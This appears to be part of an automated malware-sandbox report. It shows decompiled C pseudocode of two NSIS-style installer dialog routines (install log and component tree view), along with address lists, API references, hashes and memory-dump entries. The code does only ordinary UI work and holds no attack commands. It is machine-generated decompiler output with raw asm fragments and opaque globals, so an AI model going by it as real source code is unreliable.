							ShowWindow( *0x47eab4, 8);
							if( *0x47eb6c == _t160) {
								E00404F9E( *((intOrPtr*)( *0x461db8 + 0x34)), _t160);
							}
							E00403D44(1);
							goto L26;
						}
						 *0x461dc0 = 2;
						E00403D44(0x78);
						goto L21;
					} else {
						if(_a12 != 0x403) {
							L21:
							return E00403DF6(_a8, _a12, _a16);
						}
						ShowWindow( *0x476a80, _t160);
						ShowWindow(_t171, 8);
						E00403DC4(_t171);
						goto L18;
					}
				}
				_v64 = _v64 | 0xffffffff;
				_v52 = _v52 | 0xffffffff;
				_v72 = 2;
				_v68 = 0;
				_v60 = 0;
				_v56 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t132 =  *0x47eabc;
				_a8 =  *((intOrPtr*)(_t132 + 0x5c));
				_a12 =  *((intOrPtr*)(_t132 + 0x60));
				 *0x476a80 = GetDlgItem(_a4, 0x403);
				 *0x476a78 = GetDlgItem(_a4, 0x3ee);
				_t136 = GetDlgItem(_a4, 0x3f8);
				 *0x476a6c = _t136;
				_v8 = _t136;
				E00403DC4( *0x476a80);
				_t138 = E004044A2(4);
				_push(0x4d30a8);
				 *0x476a84 = _t138;
				 *0x476a8c = 0;
				E004062CF(L"New install of \"%s\" to \"%s\"", E00406831(0, GetDlgItem, _t171, 0, 0xfffffffd));
				GetClientRect(_v8,  &_v28);
				_v64 = _v28.right - GetSystemMetrics(0x15);
				SendMessageW(_v8, 0x1061, 0,  &_v72);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t160) {
					SendMessageW(_v8, 0x1024, _t160, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403D6B(_a4);
				if(( *0x47eb08 & 0x00000003) != 0) {
					ShowWindow( *0x476a80, _t160);
					if(( *0x47eb08 & 0x00000002) != 0) {
						 *0x476a80 = _t160;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403DC4( *0x476a78);
				}
				_t170 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t170, 0x401, _t160, 0x75300000);
				if(( *0x47eb08 & 0x00000004) != 0) {
					SendMessageW(_t170, 0x409, _t160, _a12);
					SendMessageW(_t170, 0x2001, _t160, _a8);
				}
				goto L12;
			}




































                                                                                                                                                    0x00405101
                                                                                                                                                    0x00405107
                                                                                                                                                    0x00405111
                                                                                                                                                    0x00405114
                                                                                                                                                    0x004052c8
                                                                                                                                                    0x004052ec
                                                                                                                                                    0x004052ec
                                                                                                                                                    0x004052ff
                                                                                                                                                    0x00405320
                                                                                                                                                    0x00405327
                                                                                                                                                    0x0040537e
                                                                                                                                                    0x00405382
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405389
                                                                                                                                                    0x00405391
                                                                                                                                                    0x00405397
                                                                                                                                                    0x0040539c
                                                                                                                                                    0x004052ba
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004052ba
                                                                                                                                                    0x004053ab
                                                                                                                                                    0x004053b7
                                                                                                                                                    0x004053bd
                                                                                                                                                    0x004053c3
                                                                                                                                                    0x004053d8
                                                                                                                                                    0x004053de
                                                                                                                                                    0x004053c5
                                                                                                                                                    0x004053ca
                                                                                                                                                    0x004053d0
                                                                                                                                                    0x004053d3
                                                                                                                                                    0x004053d3
                                                                                                                                                    0x004053ec
                                                                                                                                                    0x004053f4
                                                                                                                                                    0x004053f7
                                                                                                                                                    0x00405400
                                                                                                                                                    0x00405403
                                                                                                                                                    0x0040540a
                                                                                                                                                    0x00405411
                                                                                                                                                    0x00405419
                                                                                                                                                    0x00405419
                                                                                                                                                    0x0040542d
                                                                                                                                                    0x00405431
                                                                                                                                                    0x00405437
                                                                                                                                                    0x0040543d
                                                                                                                                                    0x00405449
                                                                                                                                                    0x00405450
                                                                                                                                                    0x00405459
                                                                                                                                                    0x0040545b
                                                                                                                                                    0x00405464
                                                                                                                                                    0x0040546d
                                                                                                                                                    0x00405472
                                                                                                                                                    0x00405473
                                                                                                                                                    0x00405478
                                                                                                                                                    0x00405479
                                                                                                                                                    0x0040547d
                                                                                                                                                    0x00405480
                                                                                                                                                    0x00405481
                                                                                                                                                    0x00405489
                                                                                                                                                    0x00405494
                                                                                                                                                    0x0040549a
                                                                                                                                                    0x0040549a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004053f7
                                                                                                                                                    0x00405382
                                                                                                                                                    0x0040532f
                                                                                                                                                    0x0040535f
                                                                                                                                                    0x00405367
                                                                                                                                                    0x00405372
                                                                                                                                                    0x00405372
                                                                                                                                                    0x00405379
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405379
                                                                                                                                                    0x00405333
                                                                                                                                                    0x0040533d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405301
                                                                                                                                                    0x0040530a
                                                                                                                                                    0x00405342
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040534b
                                                                                                                                                    0x00405313
                                                                                                                                                    0x00405318
                                                                                                                                                    0x0040531b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040531b
                                                                                                                                                    0x004052ff
                                                                                                                                                    0x0040511a
                                                                                                                                                    0x0040511e
                                                                                                                                                    0x00405122
                                                                                                                                                    0x00405129
                                                                                                                                                    0x0040512c
                                                                                                                                                    0x0040512f
                                                                                                                                                    0x00405137
                                                                                                                                                    0x00405138
                                                                                                                                                    0x00405139
                                                                                                                                                    0x0040513a
                                                                                                                                                    0x0040513b
                                                                                                                                                    0x0040513c
                                                                                                                                                    0x00405155
                                                                                                                                                    0x00405158
                                                                                                                                                    0x00405165
                                                                                                                                                    0x00405174
                                                                                                                                                    0x00405179
                                                                                                                                                    0x00405181
                                                                                                                                                    0x00405186
                                                                                                                                                    0x00405189
                                                                                                                                                    0x00405190
                                                                                                                                                    0x00405195
                                                                                                                                                    0x0040519d
                                                                                                                                                    0x004051a2
                                                                                                                                                    0x004051b3
                                                                                                                                                    0x004051c2
                                                                                                                                                    0x004051e8
                                                                                                                                                    0x004051eb
                                                                                                                                                    0x004051fc
                                                                                                                                                    0x00405201
                                                                                                                                                    0x0040520f
                                                                                                                                                    0x0040521d
                                                                                                                                                    0x0040521d
                                                                                                                                                    0x00405222
                                                                                                                                                    0x00405230
                                                                                                                                                    0x00405230
                                                                                                                                                    0x00405235
                                                                                                                                                    0x00405238
                                                                                                                                                    0x0040523d
                                                                                                                                                    0x00405249
                                                                                                                                                    0x00405252
                                                                                                                                                    0x0040525f
                                                                                                                                                    0x0040526e
                                                                                                                                                    0x00405261
                                                                                                                                                    0x00405266
                                                                                                                                                    0x00405266
                                                                                                                                                    0x0040527a
                                                                                                                                                    0x0040527a
                                                                                                                                                    0x0040528f
                                                                                                                                                    0x00405297
                                                                                                                                                    0x004052a0
                                                                                                                                                    0x004052ac
                                                                                                                                                    0x004052b8
                                                                                                                                                    0x004052b8
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32 ref: 0040515B
                                                                                                                                                    • GetDlgItem.USER32 ref: 0040516A
                                                                                                                                                    • GetClientRect.USER32 ref: 004051C2
                                                                                                                                                    • GetSystemMetrics.USER32 ref: 004051CA
                                                                                                                                                    • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                    • GetDlgItem.USER32 ref: 00405287
                                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                    • GetDlgItem.USER32 ref: 00405179
                                                                                                                                                      • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425AD2,74B5EA30,00000000), ref: 00406902
                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory on Reboot("C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                    • GetDlgItem.USER32 ref: 004052D7
                                                                                                                                                    • CreateThread.KERNEL32 ref: 004052E5
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004052EC
                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                    • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                    • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                    • AppendMenuW.USER32 ref: 004053B7
                                                                                                                                                    • GetWindowRect.USER32 ref: 004053CA
                                                                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                    • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 0040543D
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                    • GlobalLock.KERNEL32 ref: 00405453
                                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405489
                                                                                                                                                    • SetClipboardData.USER32 ref: 00405494
                                                                                                                                                    • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                    • String ID: New install of "%s" to "%s"${
                                                                                                                                                    • API String ID: 2110491804-1641061399
                                                                                                                                                    • Opcode ID: b870e07e0f90b65775997a4172df4cb72c50b11c5a38a9ad208b9f3c2b6ee9f0
                                                                                                                                                    • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                    • Opcode Fuzzy Hash: b870e07e0f90b65775997a4172df4cb72c50b11c5a38a9ad208b9f3c2b6ee9f0
                                                                                                                                                    • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004049A8, Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 97%
                                                                                                                                                    			E004049A8(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				void* _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				long _v36;
				signed int _v48;
				int _v52;
				signed int* _v60;
				intOrPtr _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v84;
				intOrPtr _v88;
				void* _v92;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t177;
				intOrPtr _t193;
				long _t199;
				signed int _t203;
				signed int _t214;
				void* _t217;
				void* _t218;
				int _t225;
				signed int* _t232;
				signed int _t234;
				struct HBITMAP__* _t244;
				void* _t246;
				signed int _t265;
				signed char _t266;
				long _t269;
				int _t276;
				signed int _t280;
				signed int _t287;
				signed int _t289;
				int* _t297;
				signed char* _t298;
				int _t301;
				int _t302;
				int _t303;
				signed int* _t304;
				int _t305;
				long _t306;
				long _t307;
				int _t308;
				signed int _t309;
				void* _t311;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t177 = GetDlgItem(_a4, 0x408);
				_t311 = SendMessageW;
				_v8 = _t177;
				_v28 =  *0x47eac8;
				_t276 = 0;
				_v32 =  *0x47eabc + 0x94;
				_t301 = 0x10;
				if(_a8 != 0x110) {
					L24:
					if(_a8 == 0x405) {
						_a12 = _t276;
						_a16 = 1;
						_a8 = 0x40f;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_t302 = _a16;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t302 + 4)) == 0x408) {
							if(( *0x47eb08 & 0x00000200) != 0) {
								L41:
								if(_t302 != _t276) {
									if( *((intOrPtr*)(_t302 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, _t276,  *(_t302 + 0x5c));
									}
									if( *((intOrPtr*)(_t302 + 8)) == 0xfffffe39) {
										_t278 = _v28;
										_t232 =  *(_t302 + 0x5c) * 0x4020 + _v28 + 8;
										if( *((intOrPtr*)(_t302 + 0xc)) != 2) {
											 *_t232 =  *_t232 & 0xffffffdf;
										} else {
											 *_t232 =  *_t232 | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t278 = 0 | _a8 != 0x00000413;
								_t234 = E0040487A(_v8, _a8 != 0x413);
								if(_t234 >= _t276) {
									_t95 = _v28 + 8; // 0x8
									_t297 = _t234 * 0x4020 + _t95;
									_t278 =  *_t297;
									if((_t278 & 0x00000010) == 0) {
										if((_t278 & 0x00000040) == 0) {
											_t287 = _t278 ^ 0x00000001;
										} else {
											_t289 = _t278 ^ 0x00000080;
											if(_t289 >= 0) {
												_t287 = _t289 & 0xfffffffe;
											} else {
												_t287 = _t289 | 0x00000001;
											}
										}
										 *_t297 = _t287;
										E00401186(_t234);
										_t278 = 1;
										_a12 = 1;
										_a16 =  !( *0x47eb08 >> 8) & 1;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t278 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, _t276, _t276);
							}
							if(_a8 == 0x40b) {
								_t217 =  *0x441d68;
								if(_t217 != _t276) {
									ImageList_Destroy(_t217);
								}
								_t218 =  *0x441d6c;
								if(_t218 != _t276) {
									GlobalFree(_t218);
								}
								 *0x441d68 = _t276;
								 *0x441d6c = _t276;
								 *0x47eb10 = _t276;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x47eb08 & 0x00000100) != 0) {
									_t303 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t303);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t303);
								}
								goto L89;
							} else {
								E004011F8(_t278, _t276, _t276);
								if(_a12 != _t276) {
									E0040141D(8);
								}
								if(_a16 == _t276) {
									L73:
									E004011F8(_t278, _t276, _t276);
									_v36 =  *0x441d6c;
									_t193 =  *0x47eac8;
									_v64 = 0xf030;
									_v28 = _t276;
									if( *0x47eacc <= _t276) {
										L84:
										InvalidateRect(_v8, _t276, 1);
										if( *((intOrPtr*)( *0x476a88 + 0x10)) != _t276) {
											E004043D9(E004044A2(5), 0x3ff, 0xfffffffb);
										}
										goto L86;
									}
									_t304 = _t193 + 8;
									do {
										_t199 =  *((intOrPtr*)(_v36 + _v28 * 4));
										if(_t199 != _t276) {
											_t280 =  *_t304;
											_v72 = _t199;
											_v76 = 8;
											if((_t280 & 0x00000100) != 0) {
												_v76 = 9;
												_v60 =  &(_t304[4]);
												 *_t304 =  *_t304 & 0xfffffeff;
											}
											if((_t280 & 0x00000040) == 0) {
												_t203 = (_t280 & 0x00000001) + 1;
												if((_t280 & 0x00000010) != 0) {
													_t203 = _t203 + 3;
												}
											} else {
												_t203 = 3;
											}
											_v68 = (_t203 << 0x0000000b | _t280 & 0x00000008) + (_t203 << 0x0000000b | _t280 & 0x00000008) | _t280 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t280 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, _t276,  &_v76);
										}
										_v28 = _v28 + 1;
										_t304 =  &(_t304[0x1008]);
									} while (_v28 <  *0x47eacc);
									goto L84;
								} else {
									_t305 = E004012F1( *0x441d6c);
									E004012A6(_t305);
									_t214 = 0;
									_t278 = 0;
									if(_t305 <= _t276) {
										L72:
										SendMessageW(_v12, 0x14e, _t278, _t276);
										_a16 = _t305;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v32 + _t214 * 4)) != _t276) {
											_t278 = _t278 + 1;
										}
										_t214 = _t214 + 1;
									} while (_t214 < _t305);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t225 = SendMessageW(_v12, 0x147, _t276, _t276);
							if(_t225 == 0xffffffff) {
								goto L89;
							}
							_t306 = SendMessageW(_v12, 0x150, _t225, _t276);
							if(_t306 == 0xffffffff ||  *((intOrPtr*)(_v32 + _t306 * 4)) == _t276) {
								_t306 = 0x20;
							}
							E004012A6(_t306);
							SendMessageW(_a4, 0x420, _t276, _t306);
							_a12 = 1;
							_a16 = _t276;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x47eb10 = _a4;
					_v36 = 0;
					_v24 = 2;
					 *0x441d6c = GlobalAlloc(0x40,  *0x47eacc << 2);
					_t244 = LoadBitmapW( *0x47eab8, 0x6e);
					 *0x461dc8 =  *0x461dc8 | 0xffffffff;
					_v20 = _t244;
					 *0x441d58 = SetWindowLongW(_v8, 0xfffffffc, E004048F8);
					_t246 = ImageList_Create(_t301, _t301, 0x21, 6, 0);
					 *0x441d68 = _t246;
					ImageList_AddMasked(_t246, _v20, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x441d68);
					if(SendMessageW(_v8, 0x111c, 0, 0) < _t301) {
						SendMessageW(_v8, 0x111b, _t301, 0);
					}
					DeleteObject(_v20);
					_t307 = 0;
					do {
						_t252 =  *((intOrPtr*)(_v32 + _t307 * 4));
						if( *((intOrPtr*)(_v32 + _t307 * 4)) != _t276) {
							if(_t307 != 0x20) {
								_v24 = _t276;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, _t276, E00406831(_t276, _t307, _t311, _t276, _t252)), _t307);
						}
						_t307 = _t307 + 1;
					} while (_t307 < 0x21);
					_t308 = _a16;
					_push( *((intOrPtr*)(_t308 + 0x30 + _v24 * 4)));
					_push(0x15);
					E00403D6B(_a4);
					_push( *((intOrPtr*)(_t308 + 0x34 + _v24 * 4)));
					_push(0x16);
					E00403D6B(_a4);
					_t309 = 0;
					_v16 = _t276;
					if( *0x47eacc <= _t276) {
						L20:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0xfffffffb);
						goto L21;
					} else {
						_v20 = _v28 + 8;
						do {
							_t298 = _v20;
							_t265 =  &(_t298[0x10]);
							if( *_t265 == 0) {
								goto L18;
							}
							_v68 = _t265;
							_t266 =  *_t298;
							_v92 = _v16;
							_t278 = 0x20;
							_v88 = 0xffff0002;
							_v84 = 0xd;
							_v72 = _t278;
							_v48 = _t309;
							_v76 = _t266 & _t278;
							if((_t266 & 0x00000002) == 0) {
								if(( *_v20 & 0x00000004) == 0) {
									_t269 = SendMessageW(_v8, 0x1132, 0,  &_v92);
									goto L17;
								}
								_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
							} else {
								_v84 = 0x4d;
								_v52 = 1;
								_t269 = SendMessageW(_v8, 0x1132, 0,  &_v92);
								_v16 = _t269;
								_v36 = 1;
								L17:
								_t278 =  *0x441d6c;
								 *( *0x441d6c + _t309 * 4) = _t269;
							}
							L18:
							_v20 = _v20 + 0x4020;
							_t309 = _t309 + 1;
						} while (_t309 <  *0x47eacc);
						if(_v36 != 0) {
							L21:
							if(_v24 != 0) {
								E00403DC4(_v8);
								_t276 = 0;
								goto L24;
							}
							ShowWindow(_v12, 5);
							E00403DC4(_v12);
							L89:
							return E00403DF6(_a8, _a12, _a16);
						}
						goto L20;
					}
				}
			}























































                                                                                                                                                    0x004049c9
                                                                                                                                                    0x004049cc
                                                                                                                                                    0x004049ce
                                                                                                                                                    0x004049d4
                                                                                                                                                    0x004049dc
                                                                                                                                                    0x004049e9
                                                                                                                                                    0x004049f4
                                                                                                                                                    0x004049f7
                                                                                                                                                    0x004049f8
                                                                                                                                                    0x00404c18
                                                                                                                                                    0x00404c1f
                                                                                                                                                    0x00404c21
                                                                                                                                                    0x00404c24
                                                                                                                                                    0x00404c2b
                                                                                                                                                    0x00404c2b
                                                                                                                                                    0x00404c3b
                                                                                                                                                    0x00404c46
                                                                                                                                                    0x00404c4c
                                                                                                                                                    0x00404c65
                                                                                                                                                    0x00404ce0
                                                                                                                                                    0x00404ce2
                                                                                                                                                    0x00404ceb
                                                                                                                                                    0x00404cf9
                                                                                                                                                    0x00404cf9
                                                                                                                                                    0x00404d02
                                                                                                                                                    0x00404d07
                                                                                                                                                    0x00404d14
                                                                                                                                                    0x00404d18
                                                                                                                                                    0x00404d1f
                                                                                                                                                    0x00404d1a
                                                                                                                                                    0x00404d1a
                                                                                                                                                    0x00404d1a
                                                                                                                                                    0x00404d18
                                                                                                                                                    0x00404d02
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404ce2
                                                                                                                                                    0x00404c6a
                                                                                                                                                    0x00404c75
                                                                                                                                                    0x00404c7a
                                                                                                                                                    0x00404c81
                                                                                                                                                    0x00404c88
                                                                                                                                                    0x00404c95
                                                                                                                                                    0x00404c95
                                                                                                                                                    0x00404c99
                                                                                                                                                    0x00404c9e
                                                                                                                                                    0x00404ca3
                                                                                                                                                    0x00404cb9
                                                                                                                                                    0x00404ca5
                                                                                                                                                    0x00404ca5
                                                                                                                                                    0x00404cad
                                                                                                                                                    0x00404cb4
                                                                                                                                                    0x00404caf
                                                                                                                                                    0x00404caf
                                                                                                                                                    0x00404caf
                                                                                                                                                    0x00404cad
                                                                                                                                                    0x00404cbd
                                                                                                                                                    0x00404cbf
                                                                                                                                                    0x00404cce
                                                                                                                                                    0x00404cd3
                                                                                                                                                    0x00404cd6
                                                                                                                                                    0x00404cd9
                                                                                                                                                    0x00404cd9
                                                                                                                                                    0x00404c9e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404c88
                                                                                                                                                    0x00404c6c
                                                                                                                                                    0x00404c73
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404d22
                                                                                                                                                    0x00404d22
                                                                                                                                                    0x00404d29
                                                                                                                                                    0x00404da0
                                                                                                                                                    0x00404da7
                                                                                                                                                    0x00404db3
                                                                                                                                                    0x00404db3
                                                                                                                                                    0x00404dbc
                                                                                                                                                    0x00404dbe
                                                                                                                                                    0x00404dc5
                                                                                                                                                    0x00404dc8
                                                                                                                                                    0x00404dc8
                                                                                                                                                    0x00404dce
                                                                                                                                                    0x00404dd5
                                                                                                                                                    0x00404dd8
                                                                                                                                                    0x00404dd8
                                                                                                                                                    0x00404dde
                                                                                                                                                    0x00404de4
                                                                                                                                                    0x00404dea
                                                                                                                                                    0x00404dea
                                                                                                                                                    0x00404df7
                                                                                                                                                    0x00404f48
                                                                                                                                                    0x00404f4f
                                                                                                                                                    0x00404f6f
                                                                                                                                                    0x00404f75
                                                                                                                                                    0x00404f87
                                                                                                                                                    0x00404f87
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404dfd
                                                                                                                                                    0x00404dff
                                                                                                                                                    0x00404e07
                                                                                                                                                    0x00404e0b
                                                                                                                                                    0x00404e0b
                                                                                                                                                    0x00404e13
                                                                                                                                                    0x00404e54
                                                                                                                                                    0x00404e56
                                                                                                                                                    0x00404e60
                                                                                                                                                    0x00404e63
                                                                                                                                                    0x00404e68
                                                                                                                                                    0x00404e6f
                                                                                                                                                    0x00404e78
                                                                                                                                                    0x00404f1f
                                                                                                                                                    0x00404f25
                                                                                                                                                    0x00404f33
                                                                                                                                                    0x00404f43
                                                                                                                                                    0x00404f43
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404f33
                                                                                                                                                    0x00404e7e
                                                                                                                                                    0x00404e81
                                                                                                                                                    0x00404e87
                                                                                                                                                    0x00404e8c
                                                                                                                                                    0x00404e8e
                                                                                                                                                    0x00404e90
                                                                                                                                                    0x00404e93
                                                                                                                                                    0x00404ea0
                                                                                                                                                    0x00404ea5
                                                                                                                                                    0x00404eac
                                                                                                                                                    0x00404eaf
                                                                                                                                                    0x00404eaf
                                                                                                                                                    0x00404eb8
                                                                                                                                                    0x00404ec4
                                                                                                                                                    0x00404ec8
                                                                                                                                                    0x00404eca
                                                                                                                                                    0x00404eca
                                                                                                                                                    0x00404eba
                                                                                                                                                    0x00404ebc
                                                                                                                                                    0x00404ebc
                                                                                                                                                    0x00404ef3
                                                                                                                                                    0x00404ef6
                                                                                                                                                    0x00404f05
                                                                                                                                                    0x00404f05
                                                                                                                                                    0x00404f07
                                                                                                                                                    0x00404f0d
                                                                                                                                                    0x00404f13
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404e15
                                                                                                                                                    0x00404e20
                                                                                                                                                    0x00404e23
                                                                                                                                                    0x00404e28
                                                                                                                                                    0x00404e2a
                                                                                                                                                    0x00404e2e
                                                                                                                                                    0x00404e3e
                                                                                                                                                    0x00404e48
                                                                                                                                                    0x00404e4a
                                                                                                                                                    0x00404e4d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404e30
                                                                                                                                                    0x00404e30
                                                                                                                                                    0x00404e36
                                                                                                                                                    0x00404e38
                                                                                                                                                    0x00404e38
                                                                                                                                                    0x00404e39
                                                                                                                                                    0x00404e3a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404e30
                                                                                                                                                    0x00404e13
                                                                                                                                                    0x00404df7
                                                                                                                                                    0x00404d34
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404d4a
                                                                                                                                                    0x00404d54
                                                                                                                                                    0x00404d59
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404d6b
                                                                                                                                                    0x00404d70
                                                                                                                                                    0x00404d7c
                                                                                                                                                    0x00404d7c
                                                                                                                                                    0x00404d7e
                                                                                                                                                    0x00404d8d
                                                                                                                                                    0x00404d8f
                                                                                                                                                    0x00404d96
                                                                                                                                                    0x00404d99
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404d99
                                                                                                                                                    0x00404d34
                                                                                                                                                    0x004049fe
                                                                                                                                                    0x00404a01
                                                                                                                                                    0x00404a11
                                                                                                                                                    0x00404a14
                                                                                                                                                    0x00404a29
                                                                                                                                                    0x00404a2e
                                                                                                                                                    0x00404a34
                                                                                                                                                    0x00404a45
                                                                                                                                                    0x00404a55
                                                                                                                                                    0x00404a5a
                                                                                                                                                    0x00404a68
                                                                                                                                                    0x00404a6e
                                                                                                                                                    0x00404a84
                                                                                                                                                    0x00404a94
                                                                                                                                                    0x00404aa0
                                                                                                                                                    0x00404aa0
                                                                                                                                                    0x00404aa5
                                                                                                                                                    0x00404aab
                                                                                                                                                    0x00404aad
                                                                                                                                                    0x00404ab0
                                                                                                                                                    0x00404ab5
                                                                                                                                                    0x00404aba
                                                                                                                                                    0x00404abc
                                                                                                                                                    0x00404abc
                                                                                                                                                    0x00404adc
                                                                                                                                                    0x00404adc
                                                                                                                                                    0x00404ade
                                                                                                                                                    0x00404adf
                                                                                                                                                    0x00404ae7
                                                                                                                                                    0x00404aea
                                                                                                                                                    0x00404aee
                                                                                                                                                    0x00404af3
                                                                                                                                                    0x00404afb
                                                                                                                                                    0x00404aff
                                                                                                                                                    0x00404b04
                                                                                                                                                    0x00404b09
